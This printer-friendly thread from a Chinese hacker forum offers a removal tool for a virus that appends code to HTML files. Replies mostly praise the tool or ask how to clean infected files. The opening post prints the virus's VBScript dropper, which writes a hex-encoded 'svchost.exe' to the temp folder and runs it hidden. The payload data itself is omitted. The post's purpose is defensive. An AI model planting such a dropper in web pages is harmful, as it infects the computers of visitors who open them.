黑帽联盟

标题: 专杀HTML感染木马工具 [打印本页]
作者: yun    时间: 2017-5-24 17:58
标题: 专杀HTML感染木马工具
这个病毒会在所有html的文件的后面直接加上他自己的数据    我也不知道是什么数据    反正是特别那个啥

各种说的什么远控马   什么劫持快照  什么的

大概结构:
  1. <SCRIPT Language=VBScript><!--
  2. DropFileName = "svchost.exe"
  3. WriteData = 这里本来有好长的十六进制的数据(应该是吧。)
  4. Set FSO = CreateObject("Scripting.FileSystemObject")
  5. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  6. If FSO.FileExists(DropPath)=False Then
  7. Set FileObj = FSO.CreateTextFile(DropPath, True)
  8. For i = 1 To Len(WriteData) Step 2
  9. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  10. Next
  11. FileObj.Close
  12. End If
  13. Set WSHshell = CreateObject("WScript.Shell")  
  14. WSHshell.Run DropPath, 0
  15. //--></SCRIPT>
复制代码
该工具专杀这个病毒

工具截图:
112.png

工具下载地址:
作者: pangkee    时间: 2017-5-25 01:29
这么牛掰?没发现啥组织出来认领哈
作者: 583558386    时间: 2017-5-25 08:50

这么牛掰?没发现第一看到
作者: 左右为难    时间: 2017-5-25 13:23
这么牛掰?.........
作者: feihu    时间: 2017-5-26 07:50
我之前就是中的就是这种病毒,特别烦人
作者: 小熊熊    时间: 2017-7-6 16:59
我html本地的 后面都加了很长一串 。 。 。 这个是直接删掉后面那个,还是把html文件给删了?
作者: feihu    时间: 2017-7-6 17:02
小熊熊 发表于 2017-7-6 16:59
我html本地的 后面都加了很长一串 。 。 。 这个是直接删掉后面那个,还是把html文件给删了?

自己本地可以试试啊,我待会试试看
作者: hackerc    时间: 2017-7-10 00:37
感谢分享~经常遇到html感染~不晓得为什么就感染了
作者: 雨爱    时间: 2017-7-14 23:07
good    好东西
作者: 小熊熊    时间: 2017-8-18 17:51
feihu 发表于 2017-7-6 17:02
自己本地可以试试啊,我待会试试看

恩 你试的怎么样了 我的被360删了..
作者: dhb94    时间: 2019-6-6 14:23
好牛掰的样子
作者: zhang1230    时间: 2019-6-13 08:50
厉害 收了
作者: song1021165315    时间: 2019-6-20 18:16
服务费服务二人各热热热



欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5